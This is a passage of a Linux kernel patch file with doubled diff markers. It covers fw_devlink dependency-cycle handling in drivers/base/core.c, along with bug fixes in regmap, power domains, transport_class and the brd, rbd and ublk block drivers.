+ 
+ 	device_lock(dev);
+-	val = !list_empty(&dev->fwnode->suppliers);
++	mutex_lock(&fwnode_link_lock);
++	val = !!fwnode_links_check_suppliers(dev->fwnode);
++	mutex_unlock(&fwnode_link_lock);
+ 	device_unlock(dev);
+ 	return sysfs_emit(buf, "%u\n", val);
+ }
+@@ -1266,16 +1353,23 @@ void device_links_driver_bound(struct device *dev)
+ 	 * them. So, fw_devlink no longer needs to create device links to any
+ 	 * of the device's suppliers.
+ 	 *
+-	 * Also, if a child firmware node of this bound device is not added as
+-	 * a device by now, assume it is never going to be added and make sure
+-	 * other devices don't defer probe indefinitely by waiting for such a
+-	 * child device.
++	 * Also, if a child firmware node of this bound device is not added as a
++	 * device by now, assume it is never going to be added. Make this bound
++	 * device the fallback supplier to the dangling consumers of the child
++	 * firmware node because this bound device is probably implementing the
++	 * child firmware node functionality and we don't want the dangling
++	 * consumers to defer probe indefinitely waiting for a device for the
++	 * child firmware node.
+ 	 */
+ 	if (dev->fwnode && dev->fwnode->dev == dev) {
+ 		struct fwnode_handle *child;
+ 		fwnode_links_purge_suppliers(dev->fwnode);
++		mutex_lock(&fwnode_link_lock);
+ 		fwnode_for_each_available_child_node(dev->fwnode, child)
+-			fw_devlink_purge_absent_suppliers(child);
++			__fw_devlink_pickup_dangling_consumers(child,
++							       dev->fwnode);
++		__fw_devlink_link_to_consumers(dev);
++		mutex_unlock(&fwnode_link_lock);
+ 	}
+ 	device_remove_file(dev, &dev_attr_waiting_for_supplier);
+ 
+@@ -1632,8 +1726,11 @@ static int __init fw_devlink_strict_setup(char *arg)
+ }
+ early_param("fw_devlink.strict", fw_devlink_strict_setup);
+ 
+-u32 fw_devlink_get_flags(void)
++static inline u32 fw_devlink_get_flags(u8 fwlink_flags)
+ {
++	if (fwlink_flags & FWLINK_FLAG_CYCLE)
++		return FW_DEVLINK_FLAGS_PERMISSIVE | DL_FLAG_CYCLE;
++
+ 	return fw_devlink_flags;
+ }
+ 
+@@ -1671,7 +1768,7 @@ static void fw_devlink_relax_link(struct device_link *link)
+ 	if (!(link->flags & DL_FLAG_INFERRED))
+ 		return;
+ 
+-	if (link->flags == (DL_FLAG_MANAGED | FW_DEVLINK_FLAGS_PERMISSIVE))
++	if (device_link_flag_is_sync_state_only(link->flags))
+ 		return;
+ 
+ 	pm_runtime_drop_link(link);
+@@ -1768,44 +1865,138 @@ static void fw_devlink_unblock_consumers(struct device *dev)
+ 	device_links_write_unlock();
+ }
+ 
++
++static bool fwnode_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct device *dev;
++	bool ret;
++
++	if (!(fwnode->flags & FWNODE_FLAG_INITIALIZED))
++		return false;
++
++	dev = get_dev_from_fwnode(fwnode);
++	ret = !dev || dev->links.status == DL_DEV_NO_DRIVER;
++	put_device(dev);
++
++	return ret;
++}
++
++static bool fwnode_ancestor_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct fwnode_handle *parent;
++
++	fwnode_for_each_parent_node(fwnode, parent) {
++		if (fwnode_init_without_drv(parent)) {
++			fwnode_handle_put(parent);
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ /**
+- * fw_devlink_relax_cycle - Convert cyclic links to SYNC_STATE_ONLY links
+- * @con: Device to check dependencies for.
+- * @sup: Device to check against.
+- *
+- * Check if @sup depends on @con or any device dependent on it (its child or
+- * its consumer etc).  When such a cyclic dependency is found, convert all
+- * device links created solely by fw_devlink into SYNC_STATE_ONLY device links.
+- * This is the equivalent of doing fw_devlink=permissive just between the
+- * devices in the cycle. We need to do this because, at this point, fw_devlink
+- * can't tell which of these dependencies is not a real dependency.
+- *
+- * Return 1 if a cycle is found. Otherwise, return 0.
++ * __fw_devlink_relax_cycles - Relax and mark dependency cycles.
++ * @con: Potential consumer device.
++ * @sup_handle: Potential supplier's fwnode.
++ *
++ * Needs to be called with fwnode_lock and device link lock held.
++ *
++ * Check if @sup_handle or any of its ancestors or suppliers direct/indirectly
++ * depend on @con. This function can detect multiple cyles between @sup_handle
++ * and @con. When such dependency cycles are found, convert all device links
++ * created solely by fw_devlink into SYNC_STATE_ONLY device links. Also, mark
++ * all fwnode links in the cycle with FWLINK_FLAG_CYCLE so that when they are
++ * converted into a device link in the future, they are created as
++ * SYNC_STATE_ONLY device links. This is the equivalent of doing
++ * fw_devlink=permissive just between the devices in the cycle. We need to do
++ * this because, at this point, fw_devlink can't tell which of these
++ * dependencies is not a real dependency.
++ *
++ * Return true if one or more cycles were found. Otherwise, return false.
+  */
+-static int fw_devlink_relax_cycle(struct device *con, void *sup)
++static bool __fw_devlink_relax_cycles(struct device *con,
++				 struct fwnode_handle *sup_handle)
+ {
+-	struct device_link *link;
+-	int ret;
++	struct device *sup_dev = NULL, *par_dev = NULL;
++	struct fwnode_link *link;
++	struct device_link *dev_link;
++	bool ret = false;
+ 
+-	if (con == sup)
+-		return 1;
++	if (!sup_handle)
++		return false;
+ 
+-	ret = device_for_each_child(con, sup, fw_devlink_relax_cycle);
+-	if (ret)
+-		return ret;
++	/*
++	 * We aren't trying to find all cycles. Just a cycle between con and
++	 * sup_handle.
++	 */
++	if (sup_handle->flags & FWNODE_FLAG_VISITED)
++		return false;
+ 
+-	list_for_each_entry(link, &con->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
+-			continue;
++	sup_handle->flags |= FWNODE_FLAG_VISITED;
+ 
+-		if (!fw_devlink_relax_cycle(link->consumer, sup))
+-			continue;
++	sup_dev = get_dev_from_fwnode(sup_handle);
+ 
+-		ret = 1;
++	/* Termination condition. */
++	if (sup_dev == con) {
++		ret = true;
++		goto out;
++	}
+ 
+-		fw_devlink_relax_link(link);
++	/*
++	 * If sup_dev is bound to a driver and @con hasn't started binding to a
++	 * driver, sup_dev can't be a consumer of @con. So, no need to check
++	 * further.
++	 */
++	if (sup_dev && sup_dev->links.status ==  DL_DEV_DRIVER_BOUND &&
++	    con->links.status == DL_DEV_NO_DRIVER) {
++		ret = false;
++		goto out;
++	}
++
++	list_for_each_entry(link, &sup_handle->suppliers, c_hook) {
++		if (__fw_devlink_relax_cycles(con, link->supplier)) {
++			__fwnode_link_cycle(link);
++			ret = true;
++		}
++	}
++
++	/*
++	 * Give priority to device parent over fwnode parent to account for any
++	 * quirks in how fwnodes are converted to devices.
++	 */
++	if (sup_dev)
++		par_dev = get_device(sup_dev->parent);
++	else
++		par_dev = fwnode_get_next_parent_dev(sup_handle);
++
++	if (par_dev && __fw_devlink_relax_cycles(con, par_dev->fwnode))
++		ret = true;
++
++	if (!sup_dev)
++		goto out;
++
++	list_for_each_entry(dev_link, &sup_dev->links.suppliers, c_node) {
++		/*
++		 * Ignore a SYNC_STATE_ONLY flag only if it wasn't marked as
++		 * such due to a cycle.
++		 */
++		if (device_link_flag_is_sync_state_only(dev_link->flags) &&
++		    !(dev_link->flags & DL_FLAG_CYCLE))
++			continue;
++
++		if (__fw_devlink_relax_cycles(con,
++					      dev_link->supplier->fwnode)) {
++			fw_devlink_relax_link(dev_link);
++			dev_link->flags |= DL_FLAG_CYCLE;
++			ret = true;
++		}
+ 	}
++
++out:
++	sup_handle->flags &= ~FWNODE_FLAG_VISITED;
++	put_device(sup_dev);
++	put_device(par_dev);
+ 	return ret;
+ }
+ 
+@@ -1813,7 +2004,7 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  * fw_devlink_create_devlink - Create a device link from a consumer to fwnode
+  * @con: consumer device for the device link
+  * @sup_handle: fwnode handle of supplier
+- * @flags: devlink flags
++ * @link: fwnode link that's being converted to a device link
+  *
+  * This function will try to create a device link between the consumer device
+  * @con and the supplier device represented by @sup_handle.
+@@ -1830,10 +2021,17 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  *  possible to do that in the future
+  */
+ static int fw_devlink_create_devlink(struct device *con,
+-				     struct fwnode_handle *sup_handle, u32 flags)
++				     struct fwnode_handle *sup_handle,
++				     struct fwnode_link *link)
+ {
+ 	struct device *sup_dev;
+ 	int ret = 0;
++	u32 flags;
++
++	if (con->fwnode == link->consumer)
++		flags = fw_devlink_get_flags(link->flags);
++	else
++		flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	/*
+ 	 * In some cases, a device P might also be a supplier to its child node
+@@ -1854,7 +2052,26 @@ static int fw_devlink_create_devlink(struct device *con,
+ 	    fwnode_is_ancestor_of(sup_handle, con->fwnode))
+ 		return -EINVAL;
+ 
+-	sup_dev = get_dev_from_fwnode(sup_handle);
++	/*
++	 * SYNC_STATE_ONLY device links don't block probing and supports cycles.
++	 * So cycle detection isn't necessary and shouldn't be done.
++	 */
++	if (!(flags & DL_FLAG_SYNC_STATE_ONLY)) {
++		device_links_write_lock();
++		if (__fw_devlink_relax_cycles(con, sup_handle)) {
++			__fwnode_link_cycle(link);
++			flags = fw_devlink_get_flags(link->flags);
++			dev_info(con, "Fixed dependency cycle(s) with %pfwf\n",
++				 sup_handle);
++		}
++		device_links_write_unlock();
++	}
++
++	if (sup_handle->flags & FWNODE_FLAG_NOT_DEVICE)
++		sup_dev = fwnode_get_next_parent_dev(sup_handle);
++	else
++		sup_dev = get_dev_from_fwnode(sup_handle);
++
+ 	if (sup_dev) {
+ 		/*
+ 		 * If it's one of those drivers that don't actually bind to
+@@ -1863,71 +2080,34 @@ static int fw_devlink_create_devlink(struct device *con,
+ 		 */
+ 		if (sup_dev->links.status == DL_DEV_NO_DRIVER &&
+ 		    sup_handle->flags & FWNODE_FLAG_INITIALIZED) {
++			dev_dbg(con,
++				"Not linking %pfwf - dev might never probe\n",
++				sup_handle);
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		/*
+-		 * If this fails, it is due to cycles in device links.  Just
+-		 * give up on this link and treat it as invalid.
+-		 */
+-		if (!device_link_add(con, sup_dev, flags) &&
+-		    !(flags & DL_FLAG_SYNC_STATE_ONLY)) {
+-			dev_info(con, "Fixing up cyclic dependency with %s\n",
+-				 dev_name(sup_dev));
+-			device_links_write_lock();
+-			fw_devlink_relax_cycle(con, sup_dev);
+-			device_links_write_unlock();
+-			device_link_add(con, sup_dev,
+-					FW_DEVLINK_FLAGS_PERMISSIVE);
++		if (con != sup_dev && !device_link_add(con, sup_dev, flags)) {
++			dev_err(con, "Failed to create device link (0x%x) with %s\n",
++				flags, dev_name(sup_dev));
+ 			ret = -EINVAL;
+ 		}
+ 
+ 		goto out;
+ 	}
+ 
+-	/* Supplier that's already initialized without a struct device. */
+-	if (sup_handle->flags & FWNODE_FLAG_INITIALIZED)
+-		return -EINVAL;
+-
+ 	/*
+-	 * DL_FLAG_SYNC_STATE_ONLY doesn't block probing and supports
+-	 * cycles. So cycle detection isn't necessary and shouldn't be
+-	 * done.
++	 * Supplier or supplier's ancestor already initialized without a struct
++	 * device or being probed by a driver.
+ 	 */
+-	if (flags & DL_FLAG_SYNC_STATE_ONLY)
+-		return -EAGAIN;
+-
+-	/*
+-	 * If we can't find the supplier device from its fwnode, it might be
+-	 * due to a cyclic dependency between fwnodes. Some of these cycles can
+-	 * be broken by applying logic. Check for these types of cycles and
+-	 * break them so that devices in the cycle probe properly.
+-	 *
+-	 * If the supplier's parent is dependent on the consumer, then the
+-	 * consumer and supplier have a cyclic dependency. Since fw_devlink
+-	 * can't tell which of the inferred dependencies are incorrect, don't
+-	 * enforce probe ordering between any of the devices in this cyclic
+-	 * dependency. Do this by relaxing all the fw_devlink device links in
+-	 * this cycle and by treating the fwnode link between the consumer and
+-	 * the supplier as an invalid dependency.
+-	 */
+-	sup_dev = fwnode_get_next_parent_dev(sup_handle);
+-	if (sup_dev && device_is_dependent(con, sup_dev)) {
+-		dev_info(con, "Fixing up cyclic dependency with %pfwP (%s)\n",
+-			 sup_handle, dev_name(sup_dev));
+-		device_links_write_lock();
+-		fw_devlink_relax_cycle(con, sup_dev);
+-		device_links_write_unlock();
+-		ret = -EINVAL;
+-	} else {
+-		/*
+-		 * Can't check for cycles or no cycles. So let's try
+-		 * again later.
+-		 */
+-		ret = -EAGAIN;
++	if (fwnode_init_without_drv(sup_handle) ||
++	    fwnode_ancestor_init_without_drv(sup_handle)) {
++		dev_dbg(con, "Not linking %pfwf - might never become dev\n",
++			sup_handle);
++		return -EINVAL;
+ 	}
+ 
++	ret = -EAGAIN;
+ out:
+ 	put_device(sup_dev);
+ 	return ret;
+@@ -1955,7 +2135,6 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 	struct fwnode_link *link, *tmp;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->consumers, s_hook) {
+-		u32 dl_flags = fw_devlink_get_flags();
+ 		struct device *con_dev;
+ 		bool own_link = true;
+ 		int ret;
+@@ -1985,14 +2164,13 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 				con_dev = NULL;
+ 			} else {
+ 				own_link = false;
+-				dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 			}
+ 		}
+ 
+ 		if (!con_dev)
+ 			continue;
+ 
+-		ret = fw_devlink_create_devlink(con_dev, fwnode, dl_flags);
++		ret = fw_devlink_create_devlink(con_dev, fwnode, link);
+ 		put_device(con_dev);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+@@ -2012,10 +2190,7 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+  *
+  * The function creates normal (non-SYNC_STATE_ONLY) device links between @dev
+  * and the real suppliers of @dev. Once these device links are created, the
+- * fwnode links are deleted. When such device links are successfully created,
+- * this function is called recursively on those supplier devices. This is
+- * needed to detect and break some invalid cycles in fwnode links.  See
+- * fw_devlink_create_devlink() for more details.
++ * fwnode links are deleted.
+  *
+  * In addition, it also looks at all the suppliers of the entire fwnode tree
+  * because some of the child devices of @dev that have not been added yet
+@@ -2033,44 +2208,16 @@ static void __fw_devlink_link_to_suppliers(struct device *dev,
+ 	bool own_link = (dev->fwnode == fwnode);
+ 	struct fwnode_link *link, *tmp;
+ 	struct fwnode_handle *child = NULL;
+-	u32 dl_flags;
+-
+-	if (own_link)
+-		dl_flags = fw_devlink_get_flags();
+-	else
+-		dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->suppliers, c_hook) {
+ 		int ret;
+-		struct device *sup_dev;
+ 		struct fwnode_handle *sup = link->supplier;
+ 
+-		ret = fw_devlink_create_devlink(dev, sup, dl_flags);
++		ret = fw_devlink_create_devlink(dev, sup, link);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+ 
+ 		__fwnode_link_del(link);
+-
+-		/* If no device link was created, nothing more to do. */
+-		if (ret)
+-			continue;
+-
+-		/*
+-		 * If a device link was successfully created to a supplier, we
+-		 * now need to try and link the supplier to all its suppliers.
+-		 *
+-		 * This is needed to detect and delete false dependencies in
+-		 * fwnode links that haven't been converted to a device link
+-		 * yet. See comments in fw_devlink_create_devlink() for more
+-		 * details on the false dependency.
+-		 *
+-		 * Without deleting these false dependencies, some devices will
+-		 * never probe because they'll keep waiting for their false
+-		 * dependency fwnode links to be converted to device links.
+-		 */
+-		sup_dev = get_dev_from_fwnode(sup);
+-		__fw_devlink_link_to_suppliers(sup_dev, sup_dev->fwnode);
+-		put_device(sup_dev);
+ 	}
+ 
+ 	/*
+@@ -3451,7 +3598,7 @@ int device_add(struct device *dev)
+ 	/* we require the name to be set before, and pass NULL */
+ 	error = kobject_add(&dev->kobj, dev->kobj.parent, NULL);
+ 	if (error) {
+-		glue_dir = get_glue_dir(dev);
++		glue_dir = kobj;
+ 		goto Error;
+ 	}
+ 
+@@ -3551,6 +3698,7 @@ done:
+ 	device_pm_remove(dev);
+ 	dpm_sysfs_remove(dev);
+  DPMError:
++	dev->driver = NULL;
+ 	bus_remove_device(dev);
+  BusError:
+ 	device_remove_attrs(dev);
+diff --git a/drivers/base/physical_location.c b/drivers/base/physical_location.c
+index 87af641cfe1a3..951819e71b4ad 100644
+--- a/drivers/base/physical_location.c
++++ b/drivers/base/physical_location.c
+@@ -24,8 +24,11 @@ bool dev_add_physical_location(struct device *dev)
+ 
+ 	dev->physical_location =
+ 		kzalloc(sizeof(*dev->physical_location), GFP_KERNEL);
+-	if (!dev->physical_location)
++	if (!dev->physical_location) {
++		ACPI_FREE(pld);
+ 		return false;
++	}
++
+ 	dev->physical_location->panel = pld->panel;
+ 	dev->physical_location->vertical_position = pld->vertical_position;
+ 	dev->physical_location->horizontal_position = pld->horizontal_position;
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index 6471b559230e9..b411201f75bfb 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -220,13 +220,10 @@ static void genpd_debug_add(struct generic_pm_domain *genpd);
+ 
+ static void genpd_debug_remove(struct generic_pm_domain *genpd)
+ {
+-	struct dentry *d;
+-
+ 	if (!genpd_debugfs_dir)
+ 		return;
+ 
+-	d = debugfs_lookup(genpd->name, genpd_debugfs_dir);
+-	debugfs_remove(d);
++	debugfs_lookup_and_remove(genpd->name, genpd_debugfs_dir);
+ }
+ 
+ static void genpd_update_accounting(struct generic_pm_domain *genpd)
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index c6d6d53e8cd3f..7de1f27d0323d 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1942,6 +1942,8 @@ static int _regmap_bus_reg_write(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_write(map->bus_context, reg, val);
+ }
+ 
+@@ -2840,6 +2842,8 @@ static int _regmap_bus_reg_read(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_read(map->bus_context, reg, val);
+ }
+ 
+@@ -3231,6 +3235,8 @@ static int _regmap_update_bits(struct regmap *map, unsigned int reg,
+ 		*change = false;
+ 
+ 	if (regmap_volatile(map, reg) && map->reg_update_bits) {
++		reg += map->reg_base;
++		reg >>= map->format.reg_downshift;
+ 		ret = map->reg_update_bits(map->bus_context, reg, mask, val);
+ 		if (ret == 0 && change)
+ 			*change = true;
+diff --git a/drivers/base/transport_class.c b/drivers/base/transport_class.c
+index ccc86206e5087..09ee2a1e35bbd 100644
+--- a/drivers/base/transport_class.c
++++ b/drivers/base/transport_class.c
+@@ -155,12 +155,27 @@ static int transport_add_class_device(struct attribute_container *cont,
+ 				      struct device *dev,
+ 				      struct device *classdev)
+ {
++	struct transport_class *tclass = class_to_transport_class(cont->class);
+ 	int error = attribute_container_add_class_device(classdev);
+ 	struct transport_container *tcont = 
+ 		attribute_container_to_transport_container(cont);
+ 
+-	if (!error && tcont->statistics)
++	if (error)
++		goto err_remove;
++
++	if (tcont->statistics) {
+ 		error = sysfs_create_group(&classdev->kobj, tcont->statistics);
++		if (error)
++			goto err_del;
++	}
++
++	return 0;
++
++err_del:
++	attribute_container_class_device_del(classdev);
++err_remove:
++	if (tclass->remove)
++		tclass->remove(tcont, dev, classdev);
+ 
+ 	return error;
+ }
+diff --git a/drivers/block/brd.c b/drivers/block/brd.c
+index 20acc4a1fd6de..a8a77a1efe1e3 100644
+--- a/drivers/block/brd.c
++++ b/drivers/block/brd.c
+@@ -78,32 +78,25 @@ static struct page *brd_lookup_page(struct brd_device *brd, sector_t sector)
+ }
+ 
+ /*
+- * Look up and return a brd's page for a given sector.
+- * If one does not exist, allocate an empty page, and insert that. Then
+- * return it.
++ * Insert a new page for a given sector, if one does not already exist.
+  */
+-static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
++static int brd_insert_page(struct brd_device *brd, sector_t sector, gfp_t gfp)
+ {
+ 	pgoff_t idx;
+ 	struct page *page;
+-	gfp_t gfp_flags;
++	int ret = 0;
+ 
+ 	page = brd_lookup_page(brd, sector);
+ 	if (page)
+-		return page;
++		return 0;
+ 
+-	/*
+-	 * Must use NOIO because we don't want to recurse back into the
+-	 * block or filesystem layers from page reclaim.
+-	 */
+-	gfp_flags = GFP_NOIO | __GFP_ZERO | __GFP_HIGHMEM;
+-	page = alloc_page(gfp_flags);
++	page = alloc_page(gfp | __GFP_ZERO | __GFP_HIGHMEM);
+ 	if (!page)
+-		return NULL;
++		return -ENOMEM;
+ 
+-	if (radix_tree_preload(GFP_NOIO)) {
++	if (radix_tree_maybe_preload(gfp)) {
+ 		__free_page(page);
+-		return NULL;
++		return -ENOMEM;
+ 	}
+ 
+ 	spin_lock(&brd->brd_lock);
+@@ -112,16 +105,17 @@ static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
+ 	if (radix_tree_insert(&brd->brd_pages, idx, page)) {
+ 		__free_page(page);
+ 		page = radix_tree_lookup(&brd->brd_pages, idx);
+-		BUG_ON(!page);
+-		BUG_ON(page->index != idx);
++		if (!page)
++			ret = -ENOMEM;
++		else if (page->index != idx)
++			ret = -EIO;
+ 	} else {
+ 		brd->brd_nr_pages++;
+ 	}
+ 	spin_unlock(&brd->brd_lock);
+ 
+ 	radix_tree_preload_end();
+-
+-	return page;
++	return ret;
+ }
+ 
+ /*
+@@ -170,20 +164,22 @@ static void brd_free_pages(struct brd_device *brd)
+ /*
+  * copy_to_brd_setup must be called before copy_to_brd. It may sleep.
+  */
+-static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n)
++static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n,
++			     gfp_t gfp)
+ {
+ 	unsigned int offset = (sector & (PAGE_SECTORS-1)) << SECTOR_SHIFT;
+ 	size_t copy;
++	int ret;
+ 
+ 	copy = min_t(size_t, n, PAGE_SIZE - offset);
+-	if (!brd_insert_page(brd, sector))
+-		return -ENOSPC;
++	ret = brd_insert_page(brd, sector, gfp);
++	if (ret)
++		return ret;
+ 	if (copy < n) {
+ 		sector += copy >> SECTOR_SHIFT;
+-		if (!brd_insert_page(brd, sector))
+-			return -ENOSPC;
++		ret = brd_insert_page(brd, sector, gfp);
+ 	}
+-	return 0;
++	return ret;
+ }
+ 
+ /*
+@@ -256,20 +252,26 @@ static void copy_from_brd(void *dst, struct brd_device *brd,
+  * Process a single bvec of a bio.
+  */
+ static int brd_do_bvec(struct brd_device *brd, struct page *page,
+-			unsigned int len, unsigned int off, enum req_op op,
++			unsigned int len, unsigned int off, blk_opf_t opf,
+ 			sector_t sector)
+ {
+ 	void *mem;
+ 	int err = 0;
+ 
+-	if (op_is_write(op)) {
+-		err = copy_to_brd_setup(brd, sector, len);
++	if (op_is_write(opf)) {
++		/*
++		 * Must use NOIO because we don't want to recurse back into the
++		 * block or filesystem layers from page reclaim.
++		 */
++		gfp_t gfp = opf & REQ_NOWAIT ? GFP_NOWAIT : GFP_NOIO;
++
++		err = copy_to_brd_setup(brd, sector, len, gfp);
+ 		if (err)
+ 			goto out;
+ 	}
+ 
+ 	mem = kmap_atomic(page);
+-	if (!op_is_write(op)) {
++	if (!op_is_write(opf)) {
+ 		copy_from_brd(mem + off, brd, sector, len);
+ 		flush_dcache_page(page);
+ 	} else {
+@@ -298,8 +300,12 @@ static void brd_submit_bio(struct bio *bio)
+ 				(len & (SECTOR_SIZE - 1)));
+ 
+ 		err = brd_do_bvec(brd, bvec.bv_page, len, bvec.bv_offset,
+-				  bio_op(bio), sector);
++				  bio->bi_opf, sector);
+ 		if (err) {
++			if (err == -ENOMEM && bio->bi_opf & REQ_NOWAIT) {
++				bio_wouldblock_error(bio);
++				return;
++			}
+ 			bio_io_error(bio);
+ 			return;
+ 		}
+@@ -412,6 +418,7 @@ static int brd_alloc(int i)
+ 	/* Tell the block layer that this is not a rotational device */
+ 	blk_queue_flag_set(QUEUE_FLAG_NONROT, disk->queue);
+ 	blk_queue_flag_clear(QUEUE_FLAG_ADD_RANDOM, disk->queue);
++	blk_queue_flag_set(QUEUE_FLAG_NOWAIT, disk->queue);
+ 	err = add_disk(disk);
+ 	if (err)
+ 		goto out_cleanup_disk;
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 04453f4a319cb..60aed196a2e54 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -5292,8 +5292,7 @@ static void rbd_dev_release(struct device *dev)
+ 		module_put(THIS_MODULE);
+ }
+ 
+-static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+-					   struct rbd_spec *spec)
++static struct rbd_device *__rbd_dev_create(struct rbd_spec *spec)
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+@@ -5338,9 +5337,6 @@ static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+ 	rbd_dev->dev.parent = &rbd_root_dev;
+ 	device_initialize(&rbd_dev->dev);
+ 
+-	rbd_dev->rbd_client = rbdc;
+-	rbd_dev->spec = spec;
+-
+ 	return rbd_dev;
+ }
+ 
+@@ -5353,12 +5349,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+-	rbd_dev = __rbd_dev_create(rbdc, spec);
++	rbd_dev = __rbd_dev_create(spec);
+ 	if (!rbd_dev)
+ 		return NULL;
+ 
+-	rbd_dev->opts = opts;
+-
+ 	/* get an id and fill in device name */
+ 	rbd_dev->dev_id = ida_simple_get(&rbd_dev_id_ida, 0,
+ 					 minor_to_rbd_dev_id(1 << MINORBITS),
+@@ -5375,6 +5369,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ 	/* we have a ref from do_rbd_add() */
+ 	__module_get(THIS_MODULE);
+ 
++	rbd_dev->rbd_client = rbdc;
++	rbd_dev->spec = spec;
++	rbd_dev->opts = opts;
++
+ 	dout("%s rbd_dev %p dev_id %d\n", __func__, rbd_dev, rbd_dev->dev_id);
+ 	return rbd_dev;
+ 
+@@ -6736,7 +6734,7 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 		goto out_err;
+ 	}
+ 
+-	parent = __rbd_dev_create(rbd_dev->rbd_client, rbd_dev->parent_spec);
++	parent = __rbd_dev_create(rbd_dev->parent_spec);
+ 	if (!parent) {
+ 		ret = -ENOMEM;
+ 		goto out_err;
+@@ -6746,8 +6744,8 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 	 * Images related by parent/child relationships always share
+ 	 * rbd_client and spec/parent_spec, so bump their refcounts.
+ 	 */
+-	__rbd_get_client(rbd_dev->rbd_client);
+-	rbd_spec_get(rbd_dev->parent_spec);
++	parent->rbd_client = __rbd_get_client(rbd_dev->rbd_client);
++	parent->spec = rbd_spec_get(rbd_dev->parent_spec);
+ 
+ 	__set_bit(RBD_DEV_FLAG_READONLY, &parent->flags);
+ 
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 6368b56eacf11..4aec9be0ab77e 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -159,7 +159,7 @@ struct ublk_device {
+ 
+ 	struct completion	completion;
+ 	unsigned int		nr_queues_ready;
+-	atomic_t		nr_aborted_queues;
++	unsigned int		nr_privileged_daemon;
+ 
+ 	/*
+ 	 * Our ubq->daemon may be killed without any notification, so
+@@ -1179,6 +1179,9 @@ static void ublk_mark_io_ready(struct ublk_device *ub, struct ublk_queue *ubq)
+ 		ubq->ubq_daemon = current;
+ 		get_task_struct(ubq->ubq_daemon);
+ 		ub->nr_queues_ready++;
++
++		if (capable(CAP_SYS_ADMIN))
++			ub->nr_privileged_daemon++;
+ 	}
+ 	if (ub->nr_queues_ready == ub->dev_info.nr_hw_queues)
+ 		complete_all(&ub->completion);
+@@ -1203,6 +1206,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	u32 cmd_op = cmd->cmd_op;
+ 	unsigned tag = ub_cmd->tag;
+ 	int ret = -EINVAL;
++	struct request *req;
+ 
+ 	pr_devel("%s: received: cmd op %d queue %d tag %d result %d\n",
+ 			__func__, cmd->cmd_op, ub_cmd->q_id, tag,
+@@ -1253,8 +1257,8 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		 */
+ 		if (io->flags & UBLK_IO_FLAG_OWNED_BY_SRV)
+ 			goto out;
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		/* FETCH_RQ has to provide IO buffer if NEED GET DATA is not enabled */
++		if (!ub_cmd->addr && !ublk_need_get_data(ubq))
+ 			goto out;
+ 		io->cmd = cmd;
+ 		io->flags |= UBLK_IO_FLAG_ACTIVE;
+@@ -1263,8 +1267,12 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		ublk_mark_io_ready(ub, ubq);
+ 		break;
+ 	case UBLK_IO_COMMIT_AND_FETCH_REQ:
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		req = blk_mq_tag_to_rq(ub->tag_set.tags[ub_cmd->q_id], tag);
++		/*
++		 * COMMIT_AND_FETCH_REQ has to provide IO buffer if NEED GET DATA is
++		 * not enabled or it is Read IO.
++		 */
++		if (!ub_cmd->addr && (!ublk_need_get_data(ubq) || req_op(req) == REQ_OP_READ))
+ 			goto out;
+ 		if (!(io->flags & UBLK_IO_FLAG_OWNED_BY_SRV))
+ 			goto out;
+@@ -1535,6 +1543,10 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 	if (ret)
+ 		goto out_put_disk;
+ 
++	/* don't probe partitions if any one ubq daemon is un-trusted */
